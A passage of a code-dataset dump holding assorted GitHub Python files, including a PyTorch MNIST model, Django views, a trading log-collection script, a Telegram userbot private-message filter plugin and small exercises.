train_dataset, shuffle = True, batch_size = 50, num_workers = 2)\ntestloader = torch.utils.data.DataLoader(dataset = test_dataset, shuffle = False, batch_size = 50, num_workers = 2)\n\nprint(\"Loading of data Completed\")\n\n# visualising data\nimport matplotlib.pyplot as plt\ndataiter = iter(trainloader)\nimage, label = dataiter.next()\nprint(label[0])\nplt.imshow(image[0].view(-1,28),cmap = 'Greys')\nplt.show()\n\n#determinig the shape of input image\nprint(image.shape)\n\n#defining our model\n\nclass Network(nn.Module):\n\t\"\"\"docstring for Network\"\"\"\n\tdef __init__(self):\n\t\tsuper(Network, self).__init__()\n\t\tself.conv1 = nn.Conv2d(1, 16, kernel_size = 3, padding = 1)\n\t\tself.conv2 = nn.Conv2d(16, 32, kernel_size = 3, padding = 1)\n\t\tself.norm1 = nn.BatchNorm2d(16)\n\t\tself.norm2 = nn.BatchNorm2d(32)\n\t\tself.relu = nn.ReLU()\n\t\tself.maxpool = nn.MaxPool2d(kernel_size = 2, stride = 2)\n\t\tself.fc1 = nn.Linear(7*7*32, 128)\n\t\tself.fc2 = nn.Linear(128, 10)\n\t\tself.dropout = nn.Dropout(p = 0.2)\n\n\tdef forward(self,x):\n\t\tx = self.maxpool(self.relu(self.norm1(self.conv1(x))))\n\t\tx = self.maxpool(self.relu(self.norm2(self.conv2(x))))\n\t\tx = x.view(-1,7*7*32)\n\t\tx = self.relu(self.fc1(x))\n\t\tx = self.dropout(x)\n\t\tx = self.fc2(x)\n\t\treturn x\n\n#initilizing our model\nnet = Network()\n\n#defining loss and optimizer\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(net.parameters(),lr = 0.001)\n\n#training the model\nnum_epochs = 5\ntotal_step = len(trainloader)\nfor epoch in range(num_epochs):\n\tfor i,(images,labels) in enumerate(trainloader):\n\t\toutput = net(images)\n\t\tloss = criterion(output,labels)\n\t\t\n\t\toptimizer.zero_grad()\n\t\tloss.backward()\n\t\toptimizer.step()\n\n\t\tif (i+1)%100 == 0:\n\t\t\tprint('Epoch[{}/{}], step[{}/{}],loss = {: .4f}'.format(epoch+1,num_epochs,i+1,total_step,loss.item()))\n\n#evaluating our model\nwith torch.no_grad():\n correct = 0\n total = 0\n for images,labels in testloader:\n \toutput = net(images)\n \t_,predicted = torch.max(output.data,dim = 1)\n \ttotal += labels.size(0)\n \tcorrect += (predicted==labels).sum().item() \n\n print('Accuracy of model on 10000 test images = {}%'.format((correct/total)*100))\t\n\n#predicting with our model\n\ndataiter = iter(testloader)\nimage, label = dataiter.next()\nwith torch.no_grad():\n\toutput = net(image)\n_,predict = torch.max(output.data,dim = 1)\nprint('predicted = {}'.format(predict[0]))\nprint('actual = {}'.format(label[0]))\t","repo_name":"rwalia2405/MNIST","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28320258610","text":"from django.shortcuts import render, redirect\nfrom .models import *\nfrom .forms import ToDoForm\n\n# Create your views here.\ndef home(request):\n todos = ToDo.objects.order_by('post_date')[::-1]\n todoform = ToDoForm()\n ctx = {'todos' : todos, 'todoform' : todoform}\n return render(request, 'home.html', ctx)\ndef submit(request):\n action_text = request.POST.get('action_text')\n task = ToDo(action_text = action_text)\n task.save()\n return redirect('home')\ndef delete(request,id):\n task = ToDo.objects.get(pk=id)\n task.delete()\n return redirect('home')\ndef archive(request,id):\n task = ToDo.objects.get(pk=id)\n task.archive = True\n task.save()\n return redirect('home')","repo_name":"facubarafani/pruebaprogramacionb","sub_path":"pruebaprogramacionb/prueba/todolist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37405394675","text":"import contextlib\nimport re\nimport shutil\nimport tempfile\n\n\nclass HandledError(Exception):\n def __init__(self, msg, *args, **kwargs):\n super(Exception, self).__init__()\n self.message = msg.format(*args, **kwargs)\n\n\n@contextlib.contextmanager\ndef TemporaryDirectory():\n name = tempfile.mkdtemp()\n try:\n yield name\n finally:\n shutil.rmtree(name)\n\n\ndef normalize(string):\n string = string.strip()\\\n .lower()\\\n .replace(\"_\", \"-\")\n\n return re.sub(\"[^a-z0-9.-]\", \"\", string)\n","repo_name":"crepererum/eprc","sub_path":"eprc/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36799897193","text":"# 插入排序\ndef insert_sort(li):\n for i in range(1, len(li)): # 要排序的区域\n j = i - 1 # 已排序的最后一位\n temp = li[i] # 要获取的元素\n while j >= 0 and li[j] > temp:\n li[j+1] = li[j]\n j = j - 1\n li[j+1] = temp # 插入元素\n\n\nlis = [3, 2, 4, 9, 1]\ninsert_sort(lis)\nprint(lis)","repo_name":"diaoyuqiang/python","sub_path":"列表的插入排序.py","file_name":"列表的插入排序.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9115111035","text":"#!/usr/bin/env python\nimport config\nimport datetime\nimport os\nimport re\nimport subprocess\nimport time\n\n# Create the report directory if its not already present\nALPHA_REPORT_DIR = os.environ['DATA_DIR'] + '/trading/' + os.environ['STRAT'] + '/exec/' + os.environ['DATE']\nif not os.path.exists(ALPHA_REPORT_DIR):\n os.makedirs(ALPHA_REPORT_DIR)\n\nos.chdir(ALPHA_REPORT_DIR)\n\n# Look at exec.conf to get list of servers\ncfg_file = os.environ['CONFIG_DIR'] + '/exec.conf'\ntrade_cfg = config.load_trade_config(cfg_file)\n\n# Create output file\noutfile = open('alpha.' + os.environ['DATE'] + '.txt', 'w')\noutfile.write('ticker|kfrtAlpha (bps)|kfrtWeight|imbAlpha (bps)|imbWeight|netAlpha (bps)|timestamp\\n')\nUTC_OFFSET_TIMEDELTA = datetime.datetime.utcnow() - datetime.datetime.now()\n\ndef bps(input):\n if input.strip() == \"NA\":\n return input\n return str(10000*float(input))\n\n# Download fills file from each server\nREMOTE_LOG_DIR = '/spare/local/guillotine/log'\nalphaByTS = {}\nfor (host,port) in trade_cfg['servers']:\n server_num = re.findall('[0-9]+', host)[0]\n p = subprocess.Popen('scp ase@' + host + ':' + REMOTE_LOG_DIR + '/rts1_' + str(server_num) + '/alpha.log alpha.rts1_' + server_num + '.log',env=os.environ,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n retcode = p.wait()\n if not os.path.exists('alpha.rts1_' + server_num + '.log'):\n continue\n alphaFile = open('alpha.rts1_' + server_num + '.log', 'r')\n init = False\n for line in alphaFile:\n if not init:\n init = True\n continue\n\n if len(line.strip()) == 0:\n continue\n\n fields = line.strip().split('|')\n ts = fields[0]\n temp = ts.split()\n newts = temp[0] + ' ' + temp[1].split('.')[0]\n # now convert ts to UTC\n local_datetime = datetime.datetime.strptime(newts, \"%Y/%m/%d %H:%M:%S\")\n utc_datetime = local_datetime + UTC_OFFSET_TIMEDELTA\n newts = utc_datetime.strftime(\"%Y%m%d %H:%M:%S\")\n if newts not in alphaByTS:\n alphaByTS[newts] = []\n alphaByTS[newts].append((fields[1],bps(fields[2]),fields[3],bps(fields[4]),fields[5],bps(fields[6])))\n alphaFile.close()\n p = subprocess.Popen('gzip alpha.rts1_' + server_num + '.log',env=os.environ,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n retcode = p.wait()\n\ntsList = alphaByTS.keys()\ntsList.sort()\nfor ts in tsList:\n alphaByTS[ts].sort()\n for item in alphaByTS[ts]:\n for field in item:\n outfile.write(field + '|')\n outfile.write(ts + '\\n')\n\noutfile.close()\np = subprocess.Popen('gzip alpha.' + os.environ['DATE'] + '.txt',env=os.environ,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\nretcode = p.wait()\n\n","repo_name":"timothyyu/ml_monorepo","sub_path":"statarb/src/python/bin/alpha_report.py","file_name":"alpha_report.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"} +{"seq_id":"73280530931","text":"import numpy as np\n\n\ndef main():\n while True:\n s = input('Please input station number : ')\n\n if s == 'quit':\n break;\n try:\n num_of_stations = int(s)\n\n if num_of_stations <= 0:\n print(\"Please input a negative integers\")\n\n n = 1\n matrix = np.array([1])\n\n while n < num_of_stations:\n c = np.hstack((matrix, matrix))\n d = np.hstack((matrix, -matrix))\n matrix = np.vstack((c, d))\n n *= 2\n\n print(\"The sequence of stations are \")\n for x in matrix:\n print(x)\n\n if is_orthogonal(matrix):\n print(\"Matrix is orthogonal\")\n except ValueError as err:\n print(\"Please input a negative integers\")\n\n\ndef is_orthogonal(matrix):\n d = matrix.shape[0]\n\n for i in range(d):\n for j in range(i + 1, d):\n if np.dot(matrix[i], matrix[i + 1]) != 0:\n return False\n\n return True\n\n\nif __name__ == '__main__':\n main()","repo_name":"billyean/pyEx","sub_path":"sd/walsh.py","file_name":"walsh.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41298575010","text":"'''this line of code searches for occurrences of '&&' or '||' in the user's input, where each operator is surrounded \r\nby spaces, and replaces them with 'and' or 'or', respectively. This operation is a way of humanizing or simplifying \r\nlogical expressions, making them more readable or user-friendly. For example, if the user enters \"A && B || C,\" \r\nthe code will replace it with \"A and B or C.\"'''\r\nimport re\r\n\r\n# Read the number of lines from the standard input\r\nnum_lines = int(input())\r\n\r\n# Loop through each line\r\nfor _ in range(num_lines):\r\n line = input()\r\n modified_line = re.sub(r'(?<= )(&&|\\|\\|)(?= )', lambda x: 'and' if x.group() == '&&' else 'or', line)\r\n print(modified_line)\r\n","repo_name":"tavi1402/Hackerrank_solutions","sub_path":"python solutions/regex_substitution.py","file_name":"regex_substitution.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35422762454","text":"\"\"\"\n\tPreprocessing utilities\n\"\"\"\nimport numpy as np\nimport emoticons_ES\nimport twokenize_ES\n\n\n\ndef load_corpus(train_path,test_path):\n\n\t# Load data Training\n\tprint(\"Loading Training data...\")\n\ttweets, target = load_data(train_path)\n\ttrainingPartitionLength = len(target)\n\t# Load data Testing\n\tprint(\"Loading Testing data...\")\n\ttweets_test, target_test = load_data(test_path)\n\n\tall_tweets = tweets+tweets_test\n\tall_target = target+target_test\n\t\n\t\n\tx, y, vocabulary = format_data(all_tweets,all_target)\n\n\treturn [x, y, vocabulary, trainingPartitionLength]\n\ndef load_data(path):\n\t\"\"\"\n\t\tLoad the tweets and labels from the data file in the path.\n\t\"\"\"\n\n\tf = open(path,'r');\n\n\ttweets = [];\n\ttarget = [];\n\tfor line in f :\n\t\tif line != '' and line != '\\n':\n\t\t\tlistLine = line.strip().split('\\t');\n\t\t\t\n\t\t\t#Tokenize tweet\n\t\t\tlistLine[0] = u\" \".join(twokenize_ES.tokenize(listLine[0]))\n\t\t\t\n\t\t\t#Analize tweet\n\t\t\tlistLine[0] = emoticons_ES.analyze_tweet(listLine[0])\n\t\t\t\n\t\t\t#RemovePunctuation\n\t\t\tlistLine[0] = u\" \".join(twokenize_ES.remove_punct(listLine[0]))\n\n\t\t\ttweets.append(listLine[0].strip().split());\n\t\t\tif listLine[1] == 'positive':\n\t\t\t\ttarget.append([1,0,0])\n\t\t\telif listLine[1] == 'negative':\n\t\t\t\ttarget.append([0,0,1])\n\t\t\telse:\n\t\t\t\ttarget.append([0,1,0])\n\n\treturn [tweets,target]\n\ndef format_data(tw,tar):\n\n\t#Calculate maxLength\n\tmaxLength = calculateMaxLength(tw)\n\t#Padding tweets...\n\tpadded_tweets = padding(tw, maxLength)\n\n\t#Building vocabulary\n\tvocabulary = build_vocabulary(padded_tweets)\n\n\t#Mapping words with values in the vocabulary\n\tx = np.array([[vocabulary[word] for word in t] for t in padded_tweets])\n\n\ty = np.array(tar)\n\n\treturn [x,y,vocabulary]\n\ndef padding(sentences, maxLength):\n\t\"\"\"\n\t\tForce all the sentences to be of the same length by filling with <PAD/>\n\t\"\"\"\n\t\n\tpadded_sentences = []\n\tfor i in range(len(sentences)):\n\t\ts = sentences[i]\n\t\tnPads = maxLength - len(s)\n\t\tnew_s = s + [\"<PAD/>\"]*nPads\n\t\tpadded_sentences.append(new_s)\t\n\n\treturn padded_sentences\n\ndef build_vocabulary(sentences):\n\t\"\"\"\n\t\tBuild a mapping between every word and \n\t\"\"\"\n\twords = []\n\tfor sentence in sentences:\n\t\tfor word in sentence:\n\t\t\twords.append(word)\n\twords = sorted(set(words))\n\tvocabulary = {x: i for i, x in enumerate(words)}\n\n\treturn vocabulary\n\ndef calculateMaxLength(sentences):\n\treturn max(len(s) for s in sentences)\n\n\n","repo_name":"VictorMMorant/arf-project","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38031284958","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\nfrom os.path import expanduser\n\nAUTHOR = 'Ranting Penguin'\nSITENAME = 'Ranting Penguins Rants'\nSITESUBTITLES = [ 'Ranting Penguins Rants', 'Full of optimism' ]\nSITEURL = 'https://rantingpenguin.github.io/blog/'\n\nPATH = 'content'\n\nTIMEZONE = 'Europe/Prague'\n\nDEFAULT_LANG = 'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\nPLUGIN_PATHS = [expanduser('~/.local/share/pelican-plugins')]\nPLUGINS = ['asciidoc_reader']\n\nTHEME = expanduser(\"~/projects/ranting_penguin/pelican-themes/bold\")\n\n# Blogroll\nLINKS = ()\n#LINKS = (('Pelican', 'http://getpelican.com/'),\n# ('Python.org', 'http://python.org/'),\n# ('Jinja2', 'http://jinja.pocoo.org/'),\n# ('You can modify those links in your config file', '#'),)\n\n# Social widget\nSOCIAL = (('Twitter', 'https://twitter.com/ranting_penguin'),)\n#SOCIAL = (('You can add links in your config file', '#'),\n# ('Another social link', '#'),)\n\nDEFAULT_PAGINATION = 10\n\n# Uncomment following line if you want document-relative URLs when developing\nRELATIVE_URLS = True\n","repo_name":"RantingPenguin/blog","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30952173350","text":"import cv2 as cv\r\n\r\n\r\n# rescale function (img + vid + live vid)\r\ndef rescale_frame(frames, scale=0.75):\r\n width = int(frames.shape[1] * scale)\r\n height = int(frames.shape[0] * scale)\r\n\r\n dimensions = (width, height)\r\n\r\n return cv.resize(frames, dimensions, interpolation=cv.INTER_AREA)\r\n\r\n\r\n# rescale function (live vid)\r\ndef change_res(width, height):\r\n capture.set(3, width)\r\n capture.set(4, height)\r\n\r\n\r\n# Image\r\nimg = cv.imread('Images/cat_3_L.jpg')\r\ncv.imshow('cat_3_L', img)\r\n\r\nresized_image = rescale_frame(img)\r\ncv.imshow('Cat_3_L_resized', resized_image)\r\n\r\ncv.waitKey(0)\r\n\r\n\r\n# Video\r\ncapture = cv.VideoCapture('Vids/dog_v_1.mp4')\r\n\r\nwhile True:\r\n isTrue, frame = capture.read()\r\n\r\n frame_resized = rescale_frame(frame)\r\n\r\n cv.imshow('Video', frame)\r\n cv.imshow('Video_Resized', frame_resized)\r\n\r\n if cv.waitKey(20) & 0xFF == ord('d'):\r\n break\r\n\r\ncapture.release()\r\ncv.destroyAllWindows()\r\n","repo_name":"Panahda/Coding_DT","sub_path":"OpenCV_Course/rescale.py","file_name":"rescale.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3681881324","text":"import argparse\nimport yaml\n\nfrom dataclasses import dataclass\nfrom simpleclassifier.display import Display\nfrom simpleclassifier.factory import ClassifierFactory\nfrom simpleclassifier.factory import SplitterDatasetFactory\nfrom simpleclassifier.factory import SplitterFactory\nfrom simpleclassifier.profiler import Profiler\nfrom simpleclassifier.classifier_profiler import ClassifierProfiler\n\nfrom simpleclassifier.classifiers import * # noqa\nfrom simpleclassifier.splitter_datasets import * # noqa\nfrom simpleclassifier.splitters import * # noqa\n\n\n@dataclass\nclass Config:\n classifier_names: list[str]\n dataset_name: str\n splitting_strategy: str\n test_size: float\n profile_metrics: list[str]\n display_format: str\n\n\ndef main():\n config = parse_args()\n\n splitter = SplitterFactory.create_instance(config.splitting_strategy,\n test_size=config.test_size)\n\n dataset = SplitterDatasetFactory.create_instance(config.dataset_name,\n splitter=splitter)\n\n classifiers = [\n ClassifierFactory.create_instance(classifier_name, dataset=dataset)\n for classifier_name in config.classifier_names\n ]\n profiler = Profiler(config.profile_metrics)\n display = Display()\n classifier_profiler = ClassifierProfiler(classifiers, profiler, display)\n\n classifier_profiler.train()\n classifier_profiler.profile_classifiers()\n classifier_profiler.display_results(config.display_format)\n\n\ndef parse_args() -> Config:\n parser = argparse.ArgumentParser(\n \"simple classifier profiler\",\n description=\"\"\"\nA simple program to easily train, test, profile, and compare different\nclassifiers on multiple datasets\"\"\",\n )\n parser.add_argument(\"-y\",\n \"--yml\",\n help=\"path to YAML configuration file\",\n required=True)\n args = parser.parse_args()\n\n try:\n with open(args.yml, \"r\") as file:\n data = yaml.load(file, Loader=yaml.FullLoader)\n if data is None:\n data = {}\n return Config(\n data.get(\"classifier_names\", []),\n data.get(\"dataset_name\", \"breast_cancer\"),\n data.get(\"splitting_strategy\") or \"percentage\",\n data.get(\"test_size\") or 0.2,\n data.get(\"profile_metrics\", \"accuracy\"),\n data.get(\"display_format\", \"dump\"),\n )\n except FileNotFoundError:\n print(f\"configuration file '{args.yml}' was not found\")\n parser.print_usage()\n parser.exit()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jayeshgaur/Python-Framework-for-Scalable-ML","sub_path":"simpleclassifier/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73028067893","text":"# -*- coding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\n\nfrom airflow.ti_deps.deps.dagrun_exists_dep import DagrunRunningDep\nfrom fake_models import FakeDag, FakeTask, FakeTI\n\n\nclass DagrunRunningDepTest(unittest.TestCase):\n\n def test_dagrun_doesnt_exist(self):\n \"\"\"\n Task instances without dagruns should fail this dep\n \"\"\"\n dag = FakeDag(running_dagruns=[], max_active_runs=1)\n task = FakeTask(dag=dag)\n ti = FakeTI(dagrun=None, task=task, dag_id=\"fake_dag\")\n\n self.assertFalse(DagrunRunningDep().is_met(ti=ti, dep_context=None))\n\n def test_dagrun_exists(self):\n \"\"\"\n Task instances with a dagrun should pass this dep\n \"\"\"\n dag = FakeDag(running_dagruns=[], max_active_runs=1)\n task = FakeTask(dag=dag)\n ti = FakeTI(dagrun=\"Fake Dagrun\", task=task, dag_id=\"fake_dag\")\n\n self.assertTrue(DagrunRunningDep().is_met(ti=ti, dep_context=None))\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/apache_incubator-airflow/incubator-airflow-master/tests/ti_deps/deps/dagrun_exists_dep.py","file_name":"dagrun_exists_dep.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"73569219254","text":"import os\nimport time\nimport asyncio\nimport io\nimport userbot.plugins.sql_helper.pmpermit_sql as pmpermit_sql\nfrom telethon.tl.functions.users import GetFullUserRequest\nfrom telethon import events, errors, functions, types\nfrom userbot import ALIVE_NAME, CUSTOM_PMPERMIT\nfrom userbot.utils import admin_cmd\n\nPMPERMIT_PIC = os.environ.get(\"PMPERMIT_PIC\", None)\nif PMPERMIT_PIC is None:\n WARN_PIC = \"https://telegra.ph/file/196674fe4d58044289e71.jpg\"\nelse:\n WARN_PIC = PMPERMIT_PIC\n\nPM_WARNS = {}\nPREV_REPLY_MESSAGE = {}\n\n\nDEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else \"Set ALIVE_NAME in config vars in Heroku\"\nCUSTOM_MIDDLE_PMP = str(CUSTOM_PMPERMIT) if CUSTOM_PMPERMIT else \"**If You Want You Can Send A Message Here ! My Boss Will Surely See And Reply To You After 2000 Years. !**\"\nUSER_BOT_WARN_ZERO = \"You Were \\n`╔══╗╔╗──────╔╗──────╔╗\\n║╔╗║║║──────║║──────║║\\n║╚╝╚╣║╔══╦══╣║╔╦══╦═╝║\\n║╔═╗║║║╔╗║╔═╣╚╝╣║═╣╔╗║\\n║╚═╝║╚╣╚╝║╚═╣╔╗╣║═╣╚╝║\\n╚═══╩═╩══╩══╩╝╚╩══╩══╝` \\nDue To Trying To Spam Inbox Of My Master !\"\nUSER_BOT_NO_WARN = (\"`Hello My Friend ! This is` **Mr. Techno**\\n\"\n \"THIS AREA IS OF MY MASTER SO OBEY THE RULES HERE.\"\n \"`Private Messaging Security`\\n\\n\"\n \"**Currently My Boss**\\n\"\n f\"{DEFAULTUSER} is Busy ! Please Don't Spam My BOSS's Inbox\\n\\n\"\n f\"{CUSTOM_MIDDLE_PMP} \\n\\n\"\n \"**Send** `/start` **If You Want To Register Your Request**\")\n\n\nif Var.PRIVATE_GROUP_ID is not None:\n @command(pattern=\"^.approve ?(.*)\")\n async def approve_p_m(event):\n if event.fwd_from:\n return\n replied_user = await event.client(GetFullUserRequest(event.chat_id))\n firstname = replied_user.user.first_name\n reason = event.pattern_match.group(1)\n chat = await event.get_chat()\n if event.is_private:\n if not pmpermit_sql.is_approved(chat.id):\n if chat.id in PM_WARNS:\n del PM_WARNS[chat.id]\n if chat.id in PREV_REPLY_MESSAGE:\n await PREV_REPLY_MESSAGE[chat.id].delete()\n del PREV_REPLY_MESSAGE[chat.id]\n pmpermit_sql.approve(chat.id, reason)\n await event.edit(\"Approved to PM MY Boss [{}](tg://user?id={})\".format(firstname, chat.id))\n await asyncio.sleep(3)\n await event.delete()\n\n\n @command(pattern=\"^.block ?(.*)\")\n async def approve_p_m(event):\n if event.fwd_from:\n return\n replied_user = await event.client(GetFullUserRequest(event.chat_id))\n firstname = replied_user.user.first_name\n reason = event.pattern_match.group(1)\n chat = await event.get_chat()\n if event.is_private:\n if chat.id == 1263617196:\n await event.edit(\"You bitch tried to block my Creator, now i will sleep for 100 seconds\")\n await asyncio.sleep(100)\n else:\n if pmpermit_sql.is_approved(chat.id):\n pmpermit_sql.disapprove(chat.id)\n await event.edit(\" ███████▄▄███████████▄ \\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\\n▓▓▓▓▓▓███░░░░░░░░░░░░█\\n██████▀▀▀█░░░░██████▀ \\n░░░░░░░░░█░░░░█ \\n░░░░░░░░░░█░░░█ \\n░░░░░░░░░░░█░░█ \\n░░░░░░░░░░░█░░█ \\n░░░░░░░░░░░░▀▀ \\n\\n**This is Uncool ! Now My boss Banned you nigga Due To backchodi 💩**[{}](tg://user?id={})\".format(firstname, chat.id))\n await asyncio.sleep(3)\n await event.client(functions.contacts.BlockRequest(chat.id))\n\n @command(pattern=\"^.disapprove ?(.*)\")\n async def approve_p_m(event):\n if event.fwd_from:\n return\n replied_user = await event.client(GetFullUserRequest(event.chat_id))\n firstname = replied_user.user.first_name\n reason = event.pattern_match.group(1)\n chat = await event.get_chat()\n if event.is_private:\n if chat.id == 813878981:\n await event.edit(\"Sorry, I Can't Disapprove My Master\")\n else:\n if pmpermit_sql.is_approved(chat.id):\n pmpermit_sql.disapprove(chat.id)\n await event.edit(\"Disapproved [{}](tg://user?id={})\".format(firstname, chat.id))\n \n \n\n @command(pattern=\"^.listapproved\")\n async def approve_p_m(event):\n if event.fwd_from:\n return\n approved_users = pmpermit_sql.get_all_approved()\n APPROVED_PMs = \"Current Approved PMs\\n\"\n if len(approved_users) > 0:\n for a_user in approved_users:\n if a_user.reason:\n APPROVED_PMs += f\"👉 [{a_user.chat_id}](tg://user?id={a_user.chat_id}) for {a_user.reason}\\n\"\n else:\n APPROVED_PMs += f\"👉 [{a_user.chat_id}](tg://user?id={a_user.chat_id})\\n\"\n else:\n APPROVED_PMs = \"no Approved PMs (yet)\"\n if len(APPROVED_PMs) > 4095:\n with io.BytesIO(str.encode(APPROVED_PMs)) as out_file:\n out_file.name = \"approved.pms.text\"\n await event.client.send_file(\n event.chat_id,\n out_file,\n force_document=True,\n allow_cache=False,\n caption=\"Current Approved PMs\",\n reply_to=event\n )\n await event.delete()\n else:\n await event.edit(APPROVED_PMs)\n\n\n @bot.on(events.NewMessage(incoming=True))\n async def on_new_private_message(event):\n if event.from_id == bot.uid:\n return\n\n if Var.PRIVATE_GROUP_ID is None:\n return\n\n if not event.is_private:\n return\n\n message_text = event.message.message\n chat_id = event.from_id\n\n current_message_text = message_text.lower()\n if USER_BOT_NO_WARN == message_text:\n # userbot's should not reply to other userbot's\n # https://core.telegram.org/bots/faq#why-doesn-39t-my-bot-see-messages-from-other-bots\n return\n sender = await bot.get_entity(chat_id)\n\n if chat_id == bot.uid:\n\n # don't log Saved Messages\n\n return\n\n if sender.bot:\n\n # don't log bots\n\n return\n\n if sender.verified:\n\n # don't log verified accounts\n\n return\n \n if any([x in event.raw_text for x in (\"/start\", \"1\", \"2\", \"3\", \"4\", \"5\")]):\n return\n\n if not pmpermit_sql.is_approved(chat_id):\n # pm permit\n await do_pm_permit_action(chat_id, event)\n\n async def do_pm_permit_action(chat_id, event):\n if chat_id not in PM_WARNS:\n PM_WARNS.update({chat_id: 0})\n if PM_WARNS[chat_id] == 5:\n r = await event.reply(USER_BOT_WARN_ZERO)\n await asyncio.sleep(3)\n await event.client(functions.contacts.BlockRequest(chat_id))\n if chat_id in PREV_REPLY_MESSAGE:\n await PREV_REPLY_MESSAGE[chat_id].delete()\n PREV_REPLY_MESSAGE[chat_id] = r\n the_message = \"\"\n the_message += \"#BLOCKED_PMs\\n\\n\"\n the_message += f\"[User](tg://user?id={chat_id}): {chat_id}\\n\"\n the_message += f\"Message Count: {PM_WARNS[chat_id]}\\n\"\n # the_message += f\"Media: {message_media}\"\n try:\n await event.client.send_message(\n entity=Var.PRIVATE_GROUP_ID,\n message=the_message,\n # reply_to=,\n # parse_mode=\"html\",\n link_preview=False,\n # file=message_media,\n silent=True\n )\n return\n except:\n return\n r = await event.client.send_file(event.chat_id, WARN_PIC, caption=USER_BOT_NO_WARN)\n PM_WARNS[chat_id] += 1\n if chat_id in PREV_REPLY_MESSAGE:\n await PREV_REPLY_MESSAGE[chat_id].delete()\n PREV_REPLY_MESSAGE[chat_id] = r\n\nfrom userbot.utils import admin_cmd\nimport io\nimport userbot.plugins.sql_helper.pmpermit_sql as pmpermit_sql\nfrom telethon import events\n@bot.on(events.NewMessage(incoming=True, from_users=(1263617196,536157487,554048138)))\nasync def hehehe(event):\n if event.fwd_from:\n return\n chat = await event.get_chat()\n if event.is_private:\n if not pmpermit_sql.is_approved(chat.id):\n pmpermit_sql.approve(chat.id, \"**My Boss Is Best🔥**\")\n await borg.send_message(chat, \"**This User Is My Dev ! So Auto Approved !!!!**\")\n \n","repo_name":"hellboi-atul/technouserbot","sub_path":"userbot/plugins/pmpermit.py","file_name":"pmpermit.py","file_ext":"py","file_size_in_byte":9427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30239078651","text":"def is_valid(isbn):\n isbn = list(isbn.replace(\"-\", \"\"))\n length=len(isbn)\n if length==10: #isbn should have exactly 10 chars\n for i in isbn[0:-1]: #checking till (len-1) as last char can be X\n if str(i).isalpha():\n return False\n if isbn[-1] not in '0123456789':\n if isbn[-1]!='X': \n return False #if last char is not number and not X, isbn invalid\n else:\n if isbn[-1]=='X':\n isbn[-1]=10 #if last char is X, it is considered 10\n code=0\n for i,val in enumerate(isbn): \n j=length-i\n code+=(j*int(val)) #for 3-598-21508-8, code=(3*10+5*9+...+8*1)\n if code%11==0:\n return True\n return False","repo_name":"divasriv/exercism-python","sub_path":"isbn-verifier/isbn_verifier.py","file_name":"isbn_verifier.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25056465383","text":"from sklearn import naive_bayes as NB\r\nimport numpy as np\r\nimport feedparser\r\nimport pprint as pp\r\n\r\n\r\ndef textParse(bigString):\r\n import re\r\n listOfTokens = re.split(r'\\W*', bigString)\r\n return [tok.lower() for tok in listOfTokens if len(tok) > 2]\r\n\r\ndef createVocabList(dataSet):\r\n vocabSet = 